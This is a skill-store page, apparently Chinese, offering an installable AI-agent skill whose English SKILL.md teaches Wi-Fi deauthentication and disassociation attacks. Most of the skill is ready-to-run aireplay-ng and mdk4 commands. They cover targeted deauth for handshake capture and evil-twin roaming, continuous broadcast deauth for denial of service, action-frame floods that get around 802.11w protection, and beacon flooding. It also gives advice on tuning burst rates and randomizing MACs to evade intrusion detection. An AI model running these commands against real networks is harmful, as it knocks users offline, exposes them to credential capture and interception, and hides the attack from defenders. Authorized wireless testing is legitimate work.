‹ 首页

offensive-deauth-disassoc

@snailsploit · 收录于 1 周前 · 上游提交 2 个月前

Deauthentication and disassociation attacks against 802.11 networks — targeted single-client deauth for handshake capture, broadcast deauth for DoS (with authorization), action-frame attacks bypassing 802.11w (PMF), beacon flooding, mdk4 / aireplay-ng tooling, and rate-limit / PMF-aware operation. Use to coerce client reconnection (handshake capture, evil-twin roaming), as targeted DoS, or to test PMF posture.

适合你,如果需要进行Wi-Fi安全评估或测试PMF防护

/ 下载安装
offensive-deauth-disassoc.skill双击,或拖进 Claude 桌面版 / Cowork,即完成安装↓ .skill↓ .zip
用别的 agent?下载 .zip 解压,把文件夹放进它的技能目录
Claude Code~/.claude/skills/(项目级 .claude/skills/)
Codex CLI~/.codex/skills/
Cursor自动读取上面两处目录
其他工具见其文档的「skills」目录;两个下载是同一份文件,只是名字不同
/ 通过 npx 安装 校验哈希
npx oh-my-skill add snailsploit/claude-red/offensive-deauth-disassoc
/ 通过 bash 安装
curl -fsSL https://oh-my-skill.com/install.sh | bash -s -- snailsploit/claude-red/offensive-deauth-disassoc
/ 已经装过?验证本机副本,不用重装
npx oh-my-skill verify snailsploit/claude-red/offensive-deauth-disassoc
安装目标可用 --agent / --scope 或 --to 明确指定;省略时只会在唯一已存在的 agent 目录上自动选择,零命中或多命中会停止并提示。content_hash 缺失或不一致均拒装。
2669GitHub stars
~987上下文体积 · 单文件
镜像托管

怎么用

商店整理自技能原文 · 版本 aeb41ec · 表述以原文为准
它做什么

装上后,Claude 能指导你执行针对 802.11 网络的去认证和解除关联攻击,包括单客户端去认证(用于捕获握手包)、广播去认证(DoS)、绕过 PMF 的动作帧攻击、信标洪水攻击等,并给出具体命令和参数。

什么时候触发

当你需要测试无线网络安全性、捕获 WPA 握手包、或进行授权 DoS 测试时触发。

装好后可以这样说
Claude 会推荐使用 mdk4 的动作帧攻击。
技能原文 SKILL.md作者撰写 · MIT · aeb41ec

Deauth / Disassoc Attacks

The most-used 802.11 management-frame attack: send a forged deauthentication or disassociation frame as the AP, and the client disconnects. Modern PMF (802.11w) authenticates these frames cryptographically — but most consumer and many enterprise deployments still don't require PMF.

Quick Workflow
  1. Identify target client + AP (BSSID, channel)
  2. Pick deauth scope: single client (quiet) vs. broadcast (loud, DoS)
  3. Verify PMF status — if required, classic deauth fails; pivot to action-frame attacks
  4. Send the deauth burst at the right rate

Single-Client Deauth (Preferred)

Used to force handshake capture, push client to evil twin, or test reconnection behavior.

sudo aireplay-ng --deauth 5 \
  -a AA:BB:CC:DD:EE:FF \    # AP BSSID
  -c 11:22:33:44:55:66 \    # client MAC
  wlan0mon
  • --deauth 5 sends 5 deauths (10 frames — 5 to AP, 5 to client). 3–10 is usually enough.
  • More than 30 in a burst is unnecessarily noisy.
Broadcast Deauth (DoS, Use Sparingly)
# Single AP, all clients
sudo aireplay-ng --deauth 0 -a AA:BB:CC:DD:EE:FF wlan0mon
# --deauth 0 = continuous

# Multiple APs from a list
sudo mdk4 wlan0mon d -B target_bssids.txt -c 1,6,11

Only with explicit authorization. Continuous broadcast deauth is a clear DoS signal and trips most WIPS within seconds.

PMF (802.11w) Awareness

PMF authenticates deauth/disassoc frames. Status visible in beacon RSN capabilities:

sudo airodump-ng wlan0mon -c <ch> --bssid <BSSID>
# PMF column: Required / Capable / Off

| PMF Status | Deauth Effect | |---|---| | Off | Classic deauth works | | Capable (optional) | Works against clients without PMF, fails against PMF-enabled clients | | Required | Classic deauth ignored — must use action-frame attacks |

Action-Frame Attacks Against PMF

PMF protects deauth/disassoc but doesn't always protect all action frames. Specific action types remain exploitable:

# mdk4 multi-tool attacks
sudo mdk4 wlan0mon a -a <BSSID>     # auth attack: floods auth frames, AP eventually disconnects clients
sudo mdk4 wlan0mon m -t <BSSID>     # CTS frame attack — abuse virtual carrier sense
sudo mdk4 wlan0mon w -t <BSSID>     # WPA-Enterprise: SAE auth flood

Action frames the IEEE 802.11 spec marks as "may be unprotected" include some block-ack and channel-switch announcements — implementation-specific exploitation paths exist but require chipset-specific testing.

Beacon Flooding

Confuse clients (and WIPS) by flooding fake beacons:

sudo mdk4 wlan0mon b -f beacon_essids.txt -c 6 -s 100
# Floods 100 beacons/sec for ESSIDs in the file

Use cases:

  • Hide your evil twin among noise
  • Stress-test client roaming logic
  • DoS WIPS dashboards (flood with thousands of fake APs)
Rate Tuning and Detection

| Burst | Defender Signal | |---|---| | 3–10 deauth, single client | Often misclassified as roaming or RF noise | | >30 deauth/sec from one source | WIPS rule trips | | Continuous broadcast deauth | Clear DoS — alert + ticket within minutes | | Beacon flood >50/sec | Saturates WIPS dashboards |

Randomize source MAC across burst-and-pause cycles to spread the signal.

Engagement Cheatsheet
# 1. Recon — note PMF status per target
sudo airodump-ng wlan0mon -c <ch> --bssid <BSSID>

# 2. Single-client deauth for handshake capture
sudo aireplay-ng --deauth 3 -a <BSSID> -c <client> wlan0mon

# 3. PMF blocking? Try action-frame attacks
sudo mdk4 wlan0mon a -a <BSSID>

# 4. DoS scenario (authorized)
sudo aireplay-ng --deauth 0 -a <BSSID> wlan0mon
Reporting

Document for each test:

  • Target BSSID + ESSID + PMF status
  • Burst size, duration
  • Effect observed (client reconnected? handshake captured? DoS achieved?)
  • Detection signals defender would have seen

Key References
  • aireplay-ng documentation
  • mdk4: github.com/aircrack-ng/mdk4
  • IEEE 802.11w-2009 (PMF spec, now folded into 802.11-2020)
  • "Why MAC Address Randomization Doesn't Work" — research on action-frame leakage
  • Source: https://github.com/SnailSploit/offensive-checklist/blob/main/wireless.md
按 MIT 许可原样转载,未经改动 · 在 GitHub 查看 →

评论

登录即可评论;带「已验证安装」的,是发布者名下有本店的安装或持有记录。